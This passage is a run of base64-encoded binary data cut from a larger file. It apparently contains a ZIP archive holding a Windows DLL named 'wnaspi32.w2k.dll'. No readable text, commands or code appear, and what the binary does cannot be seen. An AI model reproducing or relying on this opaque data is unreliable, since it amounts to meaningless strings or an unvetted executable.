xL/4dFLlYfsP0VYef+zvDOBOHVpvAFAEudAPkVukAIfSxQkpWjvFgtORMPBe Aff/0/ELCfhbrIsBA+sIgHcyUOGKWeIkibeGZEETzmUt2QP5mH+eLSlI13yk A2tn08rPAjSW+7Fu0WuKNQ66Va4Rra6CIqXPraC/KKh4qmRof1CBj+QFHi+y cC1ndOOeBfAWhIQYrC+Z3fIlhPBeJIVU0GosuI5DaDuuDsCV+p0n4b7ok1FZ 5/1gGMZbW4Zk1N9bNu07x8/4NR6jnItAT38Zfgl6GZJ92F2pGTzca5ojpSYQ XitdKqv3hy+YCY8DyrUcKawTGltA+cMOuAPfNTj+KfErfZmIvabJnzIyFlfi XZ76MgF4+wy7qBvJ46/DronMg0JB0kZzPU82YOoCObprPhY4IaeuXy5s/oDZ 1Ynf8Ns9hqHjJsTa59BKhmP74CTgZ/jBArkDJr8RdGgFRtcjbM3cYOnb6FCn v4rOpuxGJ9T8V5Mr+POAJYcA9gMenPS2NyO46oBI1hPqg7CqUqTBB+XK3Z1t XOCuohYOnag9ITZzU1FgUIOm42cxjS4fMhFYok+q7BjP9DGUMmTNGiAxw3ll ey3X8RWWTF1z5/Io0kL+3AAXZHlUBVMns9WmEsqrJ1WSrLab5drchnFVOZDY 3zFZr1ve+ABqQTrlB5XHyqQiJBbE9EBHfJjkg0Ok8na6aLAymSC/VzdBivn3 8v3PT6p1qm5diAS/7WtJd0R8od9u+rIY/bLANywXqHxWmFy4hRcsspm1pS50 19kMZTFBkQ/WyFXejeiULvp6M6E70XVSk+LpJBuM4/foQSaHJxr+Jkx57p8m AFeQ7dQ7sUYn+X7RPh1pLubaXdiYPEtI6ciKF7rZsh2nI9lEc/ub6K4tIGH7 lkGG9dgw29TjzS7gLiKi8mymIvNQU0qhVxMAPSx8kawdyd1QmdpmPyfmFflB UhKr8YuiHakvhEajDaBFzxlna7GmkUmVcdprKK92WgRXi+JRRqqvXzW2cdaO KeRbpnzxjRDQyJKRldZtHCw4lENsoHK/MLBwHTh3wYk1x/NrFxmtBpSGbuUF t/bfzQkQI3XMMAOeS8U4lGonx8Y3t1sdpff93ftFO9xvP7DcvaT/kXgU5ED0 m4ggFUaqNOjl3qQ6gyb67ff5ADgU0dAu2t6/bG+UzSMb13RPIyhX3il5Rw9M EdUMI0UgENnpDgeyNQQ0SMHcoKIJDzx0zy0uu7lkpJ0bwomleXkOwyI5e5J8 7RjGRGJrNBkJMm/xkBmm4jY1k9lU4NaRa8hm2OB+/AguNV1XVx075a9j3Wfz U4s0J3jDA4u7UACZ3+ddcN6Cag6DDzD6LOFGVu8b4KayDpBzL5oh1RWIN7C0 JnxfKoDlfN8iBYUFqXalIonFzQgo6e1rdgyzP1naD7O7BHJMokorOtvQSHdr Dd3lU1BbfLED2yUQtSIQHQeHM4ltKbnB5Ud3NK7nAdPlCcBvPvTfRRWEzBsa wSJm9hNibfrOjqHbz2np9NOXtBx6dwJHUDsYXuS5XT1pRuG1EbSe4N39UJsd ohFC6R6Dv4TF+rKT/NE7uxmuNx8r2bV8JdXvdxiBCPjBwcBi/GvitThVA3iF 18y+yKT9Keh/t4WqgeblAXqgoztdDAQWr1bZpV1z7awXNIDc3UIv7F9NaY2m TyzXaDn2PEr1dbLUIiefQG5I0NC01m4DnWy0GHrrQfXonsVhGnGfSrP7jcCF QpFXlRcRfcXU/gzrHwawznC+d5MsJSoaQB+WERk0buJwJg4slyG/kIVQxqYB RbeSMjtLJsxyAbzhSakf+IiQqItgZo7H0U8tqJNgLWxWMNeo21+rtsJYtuE0 cHI116Ekfs86CpeVFd479noLjaoKVwMcaJ3i83T+pvM6dTCQrCFS3ANJtNKR WslZww0/t4MfJk7U+GAzAq0MuU0XvHOmMpKH7YkN7dect14VXsBiGVe4Al6O KBVMpDu9V98NFNK0r9SOuU8Ay4bmy0v1pBEoUbL0QJvFkokZ9PnI9z2Tg0jI ifZ+HmJES8u2HWnvfqOyal1XJUkdIWJCaUZm7TQTALPVsp4aL4ZWeSmne1QK SmRFXO3lG2P6sNLijAYsazuUW/tUfyvK37Sj+I7/nNGKB0Wxlv7c/G648So6 GIBhciReRG7TD5FhcLNQIgxMcYWlDAQWakOwV6yNOYC5cUP8Us4ARAAclxF0 OC2DKXEbFvZ+2OvDhoyArmmA8T6kfyvr2MnF8rfLduPBlz9abhWpNgQ8rGX0 Gffn8lX0c1qZ2Eoo69LevfFsMKiX3G09uItiwTYjljoZjCx5e0mnrkwFrdst J5b4SCoyZeSNfpbbCZasbbKe1ZVGl5yp8SnLGXOCTxDDeS+UFgNXuQJeNOkz 3/qYlR88UOf4HAXXIdGaExTi3Z8vIStUqRq8r8cTssAYNO5jOESwx3rvrQRz eoXRTOECid7idvd7uEXA6FWhZFvB/imaITHDldeoEMI8RW0/laxluB42tFkg VwZLZFX1lahEQtmMvypDkrv7FHtTU+io5YHT5/q/JGLeh53ZQe3mv6eQ5sQd u2xDgORsS3zQNevGXQ3S2kHtAxtqj1GYmeCFavOrTdwL+b/5MK5nUVuQE0/F N5i9RY9XbiLKhjtg29Hx/1ZkHbBrBLN4Q9fcg6/kr7zUBMclOaVfHlI/oIv8 RqEIhVS7T+ZmnA8bH3q6O2fnBZbNaIQxH+9gzoWL4DcwWvl2m39sEB9f3IfV O2jREL1xz0Zn4jsXy0ZD2yWY289KK1fETbnvo0Qg5Z+97zbacCz/YqnPPYHM ifqk0GSZARHSjEeeGy91O/GG1K7J/AVJIHl3whzlKUZ91eAmuKk8N+OWdogu iNT+/dEV/7AJaR2MiM40UQPnFuKJ9/TA9OYdH1go+gr0wMMrfoOi4UUONLnw 04X7OChgbXAMG22iTYK3bT9PtDT+8R889L0K62N6mH2CpxZWzyNmMfhzW3ZG 0j7HonpMeUGd9RtAnMMjauB+XNj7PTWM34MUkrFXY1bOP/e92YQLP/FT791x 4DFU0m95DhRi/iopasToIwzCeJFGbkA1wwRy0OKQ3QyDWMOJx9GYHmqZqrnO TtgmhhdDgDEWB45zRxFjBll0SO47xstl2WgfAWE9a0zpnAnsxuUWCnElX++t JuQ6FXkPdkPfz8lNJgazIDTyK2XWHJaDEK7/A+G2jehxER/iBUr3UTXEQy5K yyiv2LVxShd3PQm5mBlFzo7jSmMHHTv46HvxF7mLo9B2SLkQMucUkr0dWcHY hLImUZYXAIo0kR01VH/bXVrejw2eAfgZAAZAGAQGwB8E/h/xHmlRJTlRGWYm OhEZmf9UxU2cZe2MXaxNJAxsja1NBP9jkrEzMJaxMHQ0cPQQ/G+GgqOdkaCx saOJkxMA4P/8B/T391+7hf6/4v4/fe0PAP+fxpkuUWgB3mE0AapWoCfHj1oA CtgsAacfIF7/qw0W6r+O4f/PAQtFQMv7S6AgSvvfm1sSuDLQMRHQ/tISUAhT Egjb2Xs4WpiZOxMwcnJyEBh6EPxX2MtCjkBLxOCfha2RxX/W+by0BP9f8uT/ IqHF/wdQSwMEFAACAAgAUZlCJtHnMODoVQAAAOAAABAAAAB3bmFzcGkzMi53 MmsuZGxs7Fp/dFN1ln9JXttXeO0LmEIdqgSJDlBgKgEXDDhB+0ocUyZpaGqV go6lxg7jj/IecnYppLxE+/o1yuxxHGfW3RkOu2fxx57VcdQ6Z4TUYEoRnVLR 7Rk4TlVWX0zdiUunRCh9e+/3JaWgzp49Z//s95yX9/1x7/3e+7n3+/3e72tr 79jLWBiGYeHRdYbpZoziZv73MghP6dzflTK/LX5nXrfJ+868DaH7ttkfbHvg 3ra7f2K/5+77739Asv9oi71Nvt9+3/326h8G7D95oHnL0pKSaY6cjOTLP/Pv GThvzj+md/9ifgrere98aT4C76F3NHOUjp0zv0P7M+YOeN944oJZoW2dvuvu uyeE/HndfCLDeE0FjHr9azfk+4aY0nnTTYUM8yA0wkbfQ/PgxzrRttK61cCD YS6+GcZk0EEx50iNtnWiH18vPmaIH3wEdDAmZTzsN4CXgaeI+b8X0JM3ffvw UmnLDgnez92bU+hBZkK/fLEzzF1L25rvlu6GeknO9osYTBSIAfdSg4xpBjyZ vfBU5d6X0sWXtm1ru4fJ2TqUkxf/BnltW7Y+AITm0hwGSNf/NbqbmakyVabK VJkqU2WqTJWpMlWmylSZKv+vpWO4E66zsWqHNUCu4sKMtT7Y4AtdCXfcVia0 +KeMNQTDYf29aFyybt7U1A1Xz8ydHYeRKUFKbj/IWMkSpoOx+mMbHKFQBTDU 6e+TDY7FymEepNpiXkdzXp6/Tn+PrGBhkmhciD4Hsx/Czwz7qJSSjfAbq44X 9wxZfH7tBM8wymFuP/YCdeQpIDTmg4kq6nqrHRV4C47xfepOhz224QhHvI5y mLGizgea20ARv/5BNC4/CMrY6vQyuNxa6Uzu/fjrA1JDXx/oW23o6wV9Nzia /Tl963xotxC5U9d1UoZc0QG5ClFgJ6GAbfNlbcuktlOPDgiPnEVD0RjnaC9b yFBrqMURBwuGEFtpXUMouzevTpVy2ErVeZIOX6qRHABbbf6cTVTKYzkphTer tkJShn2EneUzRPpBpNcQCVjkZqzLifT5qXP/jcohfGG0T1pEjvd8zFvgx1Kn rZmeV1U5zKrVpaxB6C1kgdJmwLJOSXpc54Q91wBQ6TIEoGASAJQhOgAuo98h hEeehd5D+J2AeIvGon1CJAId6FFjeDu0nF+QjY4KcB3glVM4GKgLHaMAlWHA AUjLlcO2r4EUBIzKOBpjUiOYba0JBvxAYQUKyl9n8ANvxzh+1BEiXpgQprJj vBqxCnjiRxYasjlh8st58quQHEkNBxjggPrl1Ks2QV2+KAdmkbpxIUskR7nz ZM+nRTBFOfBVoFKBOh8qZUOlHruoFJCsVA6X04VjuHTS2skpIkTHGbpilwNJ BD91gdBy8Oxqfx1EfgQhAm18uDzg7cWPOnpZftW9hrwGX0iisVFWYdhXlg+b 2Za3ktVVxUyKTKJtvoR25mW0pvSP8oS+v0poTq/KE7r/KmFBOgcsAGp5P1m9 rHju1zBXksboLcp5DiiyjLDn6XFYqgCHew36SoWa8NjfQV8uaB0VazveAhjB 3UVjKjRdR4U9f38hv7zRM0qvZ63rKIxZhT0bL1Bp9vyslMg56vpg+2JDg313 IddCpcdjeesH+7Ehf2ksgMLJCwAHfhz3+rRMEe5qrCu5vxlp6Y5aNJkSJ1Ah YFxJ+LVu32FsGTqEkvOLaN/2OgymH496nSdh6bCkDKVY3la9s9yGgbQj5i3i YuwsP2htDdOYKqejNytJLwgSOxKIgCulwkDba2izYdhaMN2wvO0JjD5clBH6 ehL8Ba6yobQl5fh71ZNhGvN0ReMyhXjcUBeqwuDT0HgScdjMaCyvZNlWCOBW Czym7bjJhkL4bdCfnkbPDPzuiGdGRhnXhciL4DZnHIiqwHkOIHD4/K1cnc8X KreyTBA6PTBtNYdBTTfnzSa6GheBHZXX6niifYS/MVsP9C4w3ET7ez5mY2yc 7OxhYWAh7bL8BznS8xFvOZKsPsqZwIxFMFTZ8TGOUYIY349SDP6P2JgtbuC8 s3+SkD+Q/thOx2rcMvudcZ8qHedfxx3+zPN0kXodbl9ruR8xCFnRBtB/Y/mE /v9uAPi1mb39pm+cWpo89bukn04LPW6VPQ4YLAJZlchowHCJLUfzQkDet8rx qtXHbfC2ugFra8oOiwejlLvshCu+PL7zwRCNb5chYEua6VJRjup0Y6dOEtxK 3NZ1+8gb6L3ISWkG4VzvbjeTL4lnzHV0m5kcr5U1XKQF+IH5Vlyfcv8+FKT0 elWpaMyQisqpG4QsKcF53a4eVLQtBlo543mV9uaLQRSEdcM54101ZldP27Tu DhDfWWPalOhcz8X4eMiLeU41/MRsHjof8e51x2qm+bpmdAaLNc2CMZmsudIO AoA+TxXj98aC3/FTzjrtzRzVQqQyViJu5UDOenqGzC3Ea/Uka5ZYW9T1i5x9 nesXGzSk2lqtrl+m1izF3IpR199ANZvQ3+tgKb7OgWCX3+zqz6m/qXOtKQEW reVIxjiY2l1da4tXc9uWG95mM7HlAz1DEDhtZAWdaMNTbsubXT4uMiBZu9zF IGEanRIlde/Jy9x7aekYPsKiXYF68oLjBFZPBrtEc2fTrM6m2STjWoG6tS3o Ei1J0dRxwC1EXkFf15bDfmGHPcIZ39QlmprALygn0SVyq3Xh0Z8DTVdtcfir IuFRYsoF6MTCjbGjuFj5GgNlqdNNvJ3ulRtncEKkCagbXvcydJfY6Sg/83yX WNZVa+usdlwNShzgWvAkXsx0bnTMgacCnqs6vY658LZLBUnYzE1E5EmtlW4v YhUE2eIA4YBp8QieGF7HSqgvx79yEA8LzdXEw8HLDeu4nLh5P+5AsK7toSo8 nUkh9C+gdT84mA/Z+lncKnF7dPbF6t2gGoYn+dIZJ+d6UuYzz5N3Y5LDo3xk OfOcs4+cAwIMaEi5YPBfyFEYcCXO/PNmmTcwBljZdDWQzKIgVSakJYpmluYo WiEQSMV5knlJcTZHa7OhHxpm2pg2IcWE8LilK4lY7vtG3xwwSdenc57cQym/ zYtAWVSv15fDUXbZyF4aq3CeF3YzGrSpzuFjpkviGcLWpGiMNN8jzfJIxd3h XBD6tcfhwAWhUGMnajeOGbUcf7WD6xjGePfIq7Wbzug65HlOzObZUPNPJ7JD I5vHLXcj3gRaMQPqQDs6DiPvmzxDQ3+iNRHv9WRYGbYTkQuqoqaKQzHR2isO 45+jfDFxSJf5XvE0ZLm7fdqcQnq86bWnSWYHR8ShsJ1JlwAR3D+0TwGMxkaS 3NSXaDXpsPloXCn2JEB+qx6ygi6hHesYa/M++sfKZvVafCvDCwLBBtLEOXXX n+RSmE07VAJsqT9hyinzrrMyH9A+/C52HYWufavfB1OzFiG6DGO3/ZQyPiQ8 +jlIai3WQvOATG0fC2gXcGpVHHT1CpF/hEHXituB72ExGPBpn8+iVgCIBWrT qfT1QW3+TEp9ytUrzSe3jHkABFeyzUySvoAun9IqHQwDlUFtoBQ5bavaT8m3 gWKFraZNqswrSUH5NAOVYIO+YiVMo5cthwD6dnkn5+fk7THkKbVjunYHaLmq fVC+BgRbQPBFqYEJsVWGWIKShegbAMCqNach+ITIS3hb0D60gx2Y8p6GIyz1 DyaKIMUWwHkBBxNK1ixE18EI4PbwTNfZ7ZwxUdrSakVj8oieMRCdhUy94hi9 eIonICCO+ALaue9QBElWbe+PQgbzHEX42EuMddtG8mFPmgWV5RO6fER7+mqk xIsJhAsHuqdXBrSGOQbc0LtIeLUIdmxVPJYDSJc5hKj7GtjzcjI+obOVgx1K +ylGDgQhtC/FGQStuVwQRfqhSWKeMcSkrwgGLgrIIUo9cB1ugAit3GLAKm0K amRuDtJPANL0bQaeAMwm7HfqcB4hkBWXOO0yj4HAspzAkqB2oyFQTsLuWJtp VvGP0czmTXf2JXCdK1mTEO2k15fVwNpq2j8MfNrP7JhlNEqr92HT2ddV8sVE jrcEu6z7RzCNLsliqjPEWXr2Z5Bv9wLkk4u1l+x4eqTb9LKVIHb/RlBOY7/H MPu3ItnphQyjHVgMP59Xwk8lrDa9IAQj6Zucfa4eefGqEmztekOn71UljkOQ yhdobiDU7kGWVphI88IkaUh+LXKRX8tAT2Or6XbYaWADCABqQQCvgbRbo6Ny sbIGBTHp65Rxk1SgjJvla/bd9T69wRY3BAN6P1R4qGifjeN2J8MGml6P7T+f g61x3KSKvAwrWP6bBgjHBNKMohiLfB0S/cZgsswTeaWdZ6QZedkclQ3McCAC 5k2g3D4Js5asSSoBjlJlzQ5omsC2ckAHdjFW80AlpFOXPA0bq7GhBdAYUsOT TdYDe4TIKAxDIhD9L3ybpFlKC8scgGX5IYbUes4xrpaqNUiPA8oWnnH8mTe3 PMuboFe+pmN878sQHFzH+IvwlqcHNKeT+lsuCmqnlwGOLWdreM7UIN1Lajhy U2U25jGppWR9+a1RXV3P7rIiCm9X0UUJxqVvUM7rcJa9TRI9XxUoQ3MJH7Of gLSChcSsI13Q3f0bxjrqZu1SSau5lQlo3d8z1nMN11XLdXJpW6spJnKbUao8 IXVVO79ZKlTW8/a0AGuZBl+a4+1ggnJEBzARl45hD2zSuKO3887RrrnrIidV eUSVh9V2XoiM4C2pNuMcSHPwInK/c2BV/bDw2CnoD5+377wifH7H7lLhYKIr zOGJNiSkzc64cDCSXADNniyrZItUsV949JfAoDuif7sIiGozulp/TK0fVOuH 1PrTav2YWn8qtQMoQJCi2SWXolkwg+CkuR6PNBNaQrQRT7LaMS7lMypsap1R MaVuQmVqx8KpFUaPObWYqrdIng8no0/7SyH1DezpQmxmjvvsIDRT+JELDkXh 4NsxNhyrXtufTqn1mdQXBQb71ZT91Tx7Roi9V4DsGT11tADTVxU5gQ3GUt2U 6VZpafh8SLKHz2+VZobPPyxEf439tRe41M8p75g19bhRsaeiOPT9G2RbeLdp uVy6bh3QhQH31FYYUOv7SQn3KuwR9aeEVxOj1WtNYenKmDiMOy4A5dN2A1XX XPD1OuCZPNBSQEMgdW2BAWn2XuGJCrzoZrcIMfxIqWRvF55I44esyA7s124R Ir/Cf4zxSA/Cs1XReCGagrtCy1lxrIqTWTSAyHj7lQsOYmpBkXmmwKCwco3k iFqbFSLjcOxE++RiUvJrWHnQ1SuewpOI9JAP1kcHhMgJaLUoK2Hio1Bzu9Of 9YrHkCKcsAMm7tgb3ZBUwQ2/PSvE/oBfh8QM3lNTx5lLtTHmRTUkl1ZVgKlP FFl92uvX5xbASDTevqxXHETx6YWKdoe0TNGKpbc8QkSDvhQHBmqDmAR1UtZe cYSemrShitnUZ/jVGQ19mTV2cyek29E+afGoeIGTZguHmOMa2Agz5cxMvYJo bjnFIBiHmNR+zH+eQSTErC/1OFDIfPj8vXIRWEVhEa26fEyJwzkLlQzxZNXa buIeU8XfoyNzFsXEbsgYM6/A9Ugew0+Cn2IyKtmU9gwjl+aI9LIxIGhE6TNh v77YPUK7KaxL5BKAzhR743U0sD3boM2swjQNkwVFu0+IIMiKViBE/gmDQYjg NzCP5McFGLkAPB7oe4nSwIrsM6F3TnwX0V1d2XM8m/rthPefMbyfc7vEhVcy ksWd/rKyJ/UEZctw1Lcn8L/LRsWxMGCPN3OpqUs8kRQ/r2L9kMPi/7B1ium0 J0eBPJILTDCnV1C/zLFQbnujVNxCaodbVC5dAG+Vy3k9Nd9Ml5obmKfRmS6E JZ6yfgEjjem1yC3Ng183DSVeO4L9wqH4L9LXar+n9dfi6f+eIOC0f6WMQ9qv 8O0cwBFpTnRg9+ydbDS+bcbZQWWAIZmzf0Skybk0SzLkHM4rW5TPGHRZe3HO +2lW2TJ2liSn98pQOw2h9hrECREzem0mGt9diCOSi4gjv6jzNUCqH1frD2tW 8JguHyaDSqJKl+MNQe1xPAvOr8J5dlksTSeImNVrs53l6VdAYCU0xCzMb4Yo xdtSNryqSgZN5RIgckM7aaqCIaV9kBGiIxiTTWOjCbd03WivSSoEVyxJ20YT RrUyXTyaMEvToWoH99AIlocq5dOV8shogpdn5jahYKtdm22ieST2xMTPaZJ4 2qctM3pHE7B8RhPsJI4q7T8ZOoYpo7RWaR9hdqHtpCkb26G3EMstNJW9Rfvj EpqONe5aFqsd9gMv7dcGDW7S+0OwrT9dlhOsyyO6nNV+Z4yCs1hpspYP5bja eePkgzMvesVXuk7EYZrhZR2M9d35jDUFzwqob4VHgudZeFZfy1jhACW1vH4r u6OUzOgSuU6zbhJejaeno2Ja9KyuNzYqWRAHyZfC6U0JnWlKwFm702Foumse fiwNQtpSDo9Ne0HHeySv3KRLRZRg9yebNyUCZKODJ4nbgg3AcR0wVwCXVThY 2FADXBU+Tc6x/Q97XwMW1XUtembmAAcYmFFB0WAcIyZaTIKiCWQkMsLwo2BG R2bEHwiRMTBBIMM5qCnYIQdShuOp9ja3zX0vTWNNetM2797cJtfaND8z4gdo 8mzUJJqYJqS16bGTJhgNjGbkvLX2OQODxrb353v3/XD41uy/tdde+2/ttfbe 57ACs/Wuhmy/A/ZRP6V5ihYoEClqgBEYwRIS1obHE7dhqrwM1V1iBOJNW9CZ +LYMenDHLUSjSqcU7WZ6Lmi8rJHEzUtR4j7M9qsG49M3Mhj1oF5EzECuQOAY xbgzfPt7is3ywDQoEeYCGESraGJpnCP6vZ6IyHOgBm4//5iC+sQ01SbiNoJK gwqi2BxlDTGKUbPjDkDVTxu3hIS+gETbpL3JUdSTItS52x3BdOAK8uQS8oQy mgcbeL8hY8g20Xy5xgioyyeHMNEYXf4D6yHAaXpxJ4GfXwYBip9vQwcMhJJ3 UPHHFuiPyYdfFHwbevdjsqj37l9P3G5zoCVFWJ9BZ9r0HVfwCqonjvenBCWl uflPgQ9GUWotRqcwyveFM3fpA58bhN/UH8X9cHGPphANblDbkkuHAxpfedjQ 9Qna6CmLxfTFvopLggMUr5BQcWn4sMa3Rc/tDlyhV/FXVrTq3Cs2Cqtp82qG K+OvmFpu/jUu0MKxU0GxTEuPnJq7+VDhaDy3ADiYOzM4V1w1SBDGkp88dATC gBGLGJW0UB4WtuiDOnTtjLCJ1pVf8m2khQo9MCWAZx3jg/gTE8rfEuJ/D2xd MnThzn4mF4KYwFe0ewXYvKurzB+2aoUPdbDEnAAamNH8LsS8a36f3QozUniY Nj/McPn8V6aW9NcI92+c+mzk3bkscF6mo7lbkbPFwTni6kGSTBJfUvjGdML5 wzQhxQilNCjtClmhlPGtAV0Iq4P27SUKBt37hk7c70QVefMJWtSf8FVBDsYH 6GtoHxBYQ5vXMNz9PdA+0KDd5YbRQDf4W+Z72w2who+1L5QaP3O8tQsPFcan BRcSJON4MyNWJQ3hl0n4T2InYTzeKFjDvlhfYVYYFxHG0EUOdMveUU6nPyDn uYUQEpYVenGD3aAr0f8aL1TX4XVm+1r5XSWdZFFpx9sYElRz5hv5Z7qxMIUu hEdLChRvidG7q4ACS/F+epTE8DtB/Naj7d6sl98lUXKzcXyq5OPJMI56IZWM edobGNQKAwQxc0Asm/LpWrEkZS3omQtxpjK4kZWE+OYYRGml+e1MCpkuZErh dkUeMnkAU8ncJBMlJaoMuwNKcYrLH0Xk9rBYMoP/eAimSOAyXcpfNrUn88fl U5/x5SEZjKCgkQ8MgqWUPXxKQpvIGtpPyjlj/si3hWmZCVNEMM8rD80bTfwN l8j3ppi3hCHB80dwuV3C++YziJY6AS0G0IKfmM9wlYDUMoX/JgPjB+IAM/hn zHdrJF8SSSP4nwF+spSDc/dM11lIZFPs0vuofwirjT6NUGDkc2QuLtt/3gCR vtmEywKjYOSvgKUVZlOEPfuwz4S2fYURRu4WlKjmwnkVoXncJRS/Yklh4rsC d4mbIXwXVT/ZGoZEPkALo/NyE0+z54WKsHAsW75GwFwSyoDucS5JLcZtgkKq u462xZz4uDg4IgDC+su0kJAJ0+MCaIWBUXoNP7piN0zzKvOIoTMJt71W0eZV DFfDy6b2TGUC/AYHelhsywGR4tvy6bzN3YU+gFEDlwMzD9S8uYnBxeJ945OC 4Ip7yPAEKTRz1ADZuEQVeTVNZqywihEeofn2EOXbRUOpwiOMbxdj6HyczN9L QtsFmL8XfI/QvlWMby1i+NYyKne1PWWxND8K8zexfeFowNueSHVDDJf4OmH4 +KnP481jXuAnvq27MHhnFGKSuGaQIADmN1Esiq8QbiFalULxd4NKBiZGoi/B VzYljDIzBIaX7oS4RoNRS8LQP0Jy11Fxl8Z3LzfLPBsHOzcVaJnJDOXi1PUG YnyMuJImE0GZAkm42jic2bI5wGWJhT4bzDebvAwnxjX7X2wNryxNZCFTc6O3 7ogFOpiBWaRkEJd2KGueud9XZGS/4abr8NWNOlywnHJqiZqi51Lk1vFC8sl2 fXAGv4aRfff6dtNyDCmiyAhKktAHKg/M3LVkgXMKDxsFC5N9tssP42mwAMZT r3tFvR9H4EaxM4sMQRB7+YwvnwZLahU0z1duOvBHg26Xvg7f3KhDCafyAss6 AzP6PCoe4g/wvRPzlR3LxWIjXxKS+e5PDTDoxe4wOP354SFwoAm7w5+DtVRC 93sliMDIGCQrlgyZj7X2g8gV79PHhFAJ0FQDms/CiKv0vhLGZ6H52qcKKd8r T2Ef9xQV9AyMBjr9IHq61xRwuvid9MvqyvSnkZNzbYzQOy609FB50BqVfRnh tNg8I3MtrvSg6gT+ZBCOXTcF7wuXmmFyGYXNuTAPckEQhQ3fwXNnUN4NXfeB R/ee+aJhr5WcfIUVgbcCZmNrrHtFJdpq1bS5muFKQAy2zBmbUyGxTENW/H24 4mcqK34GyMXrMJ7cd82ifx8DJH3ooYVv4SQTyo2ZxzXlYb49TBm+g1vQQnsY VtWATN8nli0O8zJZ+quFLZfE9K98W4ygKWD+LUZfJeMDKVpJ+1Yz8GuuZLjN PWVxNEiL7vJpuJbG0S1zve3TxtbS36hrqVi4r1Bp5d8E5xMEY7TIIOtoJ+Ec oiNLnhE0E5ychUtgCvnKNDgNK/Rikca3MuwrXBI6X0wuAJwvwKs24j3Yolv0 C4EyzNHVYXFzNkxSI2hUKOggAmQd1qsKrA/oii5iNYVVIUgSoIXM9zFcMYiW iK51HFZ/NjbS8snjutaacV0r9mubfYseW34HjcoHtPwOBvUPzqjjwj7OOKHU cWn3TWxYbOrV0OCMqvptHpN2RFuJJS2M2kqUiGPic8db+HhwvqqpjEk5xNg1 1sJrolrYavTpfIVpYVCyyajn8w59F0SDvcLh5OJeew78wdl1JtO1qrUw1DVs 6MR7T8LtOKHH5U0+Yr4jhPB44x1chehf4/twRATYnfI7kXsMh5C2eYi7mc9D HyyxB9Dl854nofQD6AZTfbH70eMron3L0COAJ0v8NpYjfucJPAQvShGL0nxr 9L7dgMVk//lXF/DA9yR/1Wj44eFV806ssvqMIA9AJnVcxVf02n4PqpBTMmSo W7dGXa851HKTd28Il1qxmPHF9RfT+LpZRz8yHfxA6AveRqSXG+UX6mwdo8gr a3BM1KKy/dVVWzb1khsEagYQt0qW3GUDYBFxDFTgAPpUEiYIC8lAx8cIsail ltDRFKt6+STSIYooBkODtIKT322UlcWSKAyvGaHxf00NraA6ViDnXK7QS5RJ XZGRtLxNYQIMtTm8QZaT2vCQvwiP8mhzf6vOt1sPSoZczrBJHUHE5z9nus62 /wJFhHBcaKXZRfyuNJm71a0RLaaNqOboV2KLXiEt+rni4ukFBSZwpZkwySbw 7Qxl2GuT8VqIck5Dv4y1dgjHzBZja4zZkuJhhHjzMfbu4GfPGbjFwtDLeMja 8YkM4t38hccELan3JaOZLQxs6/iYGsoM+JIzD1cFQrRYyDC92f4qQhYMPCaz xBi4rBcLB9IgpDccnKIxeudSHTnYIP35NA4LboYcg1Xn8/DXBLamUXpmFDgm rUuaF/vGKThQZ1M2Y4XdjPidNGhfoT+zj5fSAiFdYFCvO2y+DOtdyz2CAbQZ 8xtts3Kr6dZUO6jJv9Kox6Qch4ZANc33qxTIgkXyeQYULagIbBKjuDsNlFpz CCyolmwhztzbNhOJpdhtMheW3GPkbgVaHdYw6Z9+xtwe8pxUqNxlJmyzqecL oK19JLBwjm83c36BRp1pQoj/llFmY/lv6SmwVVeYQ4bO07j5JQnVehxDwkWh N3OE/ywtMKoLfKLX7TDyZpmbAiPA2J4IXQ3jA7qd/RyqBMv6oLKm2xzAuKpe 9Bm68IVgGPJcyCG9gA1WEUbGTwpv7M4SYd5WhL3dl8gks9E+W/hl7BiYm1P6 LaRzSOvwAUYuD3Pv+vKwEuK3sdnMAy16PldmYyAx+IV54Cb/vICvWI8LeBHj q2YW6hYW0SCHGfExcpMvObhUWvoVOe1fCOZQdyUjrp/JkFnnm0JKzTwFOqXh 4KmFtjSxA/PgcUlk1UeFR6iANR/MTKeQK/4DCgbzF2CnCP1oV8wV6RndM8y9 LXGaKQvX0sF4voamRAvj04DwOH8c70iNeO+lWK3QJy41mi+2FPSkdZ7lsmDu bNBUec0URxcUBUfMX7SsMVvDXAysEEFYtvS5FXrDo/+gLse9wRjDwYs6QoFj PK+KDzPmkZbdIj3dbGVaWntiO/1cPlCs0mxAivML8oMjYrrRDBZLfOYXvplI VGHsYca3uNsIPRi8y3y4ZdpCKxbkWSpcDP6T4aBfNxT8RzF9upLvMOSzRFeo e7pYxDx01BAYpDMDE9sIGgjWOIfhYAKoRgwZQb2ZxcZASG8uTxHb+tNapwrW lMyBbq3GAPIUOzh4f4sL4sSlWpEnbTq0o0Kkp5j7WhK8ORSnyw9eMvdxK3us Kd1aQWd+a0emeaj1tghuS0q235edE8vF5XuXx1LsZV8BsroVWC1gfLrM8hQo SN1msoYJozCdy2BoystSfgG/78rLaNW99C+K+zZxq3ArMM8GmK+9BRFCLAyc zI5RzMTO6xjFTOxNHaOYiZ3WMYqZ2ESbfFq+S9odi1tmfXTH6D7Aajuikj6t FnVaLfq0WtRpRaXGKyP88i4sjBKXEpe71+lOk64GZVkIVXbJIJmmSP/tdyCZ wD2G24r3UpVOLkFOxQr57g3GSjosGlJxC6yyWr5LTl2PC8YWtQBZoSunboDY Lb37B8ldG9aAm4Z4SlzJ0rDmgwBVlis3xd9Kyan3A/K2jpzyjVyKULIcDKAk XaCnZFZ3ck/+TeSuGRA/tGgqRUkfmfCIpg5Ys9v6ifs4OepNUZaZWfyrOyFO CxLk1QbwxHgYKO68VoO53v6zLNftQ/lR91YH8lin3DjuxJe7s8+KIiLk/BB/ 2Wk9muU1bczyR75FLzJ1ayw5M7k/KxTc0211hyC7lGKKSEhGSQmWil21INbr yK1ou5xaC/RzfohRooi/N6CKSTaFhE26F+8bVJp72Xvdi2xS880QMvdWsln5 wkBOGpvszTVzdPfMIMn7hTvBbpNS0tVLrFp2Nh/SsWl4Oj5NtIZtEt419raH Yytv8vN+HQzNbL+bwl1cIkYNj/thgW5Wtixx8Wfvkr4HOYDIAdyv5ZLqQnhI lgbDozKYgNuuadK6YXJWb4ioCw1EAenFTiWbvA7I7eS22bPP5s5Gq65CuB01 it35ZKtGyEN9QGzWEzWB2IkwhE5HtBbwyq30mHbzDt+XUmAmZNqOK5bqeNqW TcHbkKVbXicLzQioVDAAklVSquYBa9QI94doXmEqvDnxgbHlJDupYD61M0JA OKHrM4+2MrBWPboTenKkH/fEuZTAeS3/Ox1/mfEsvPisnPH3zxUA/f6XMZE/ 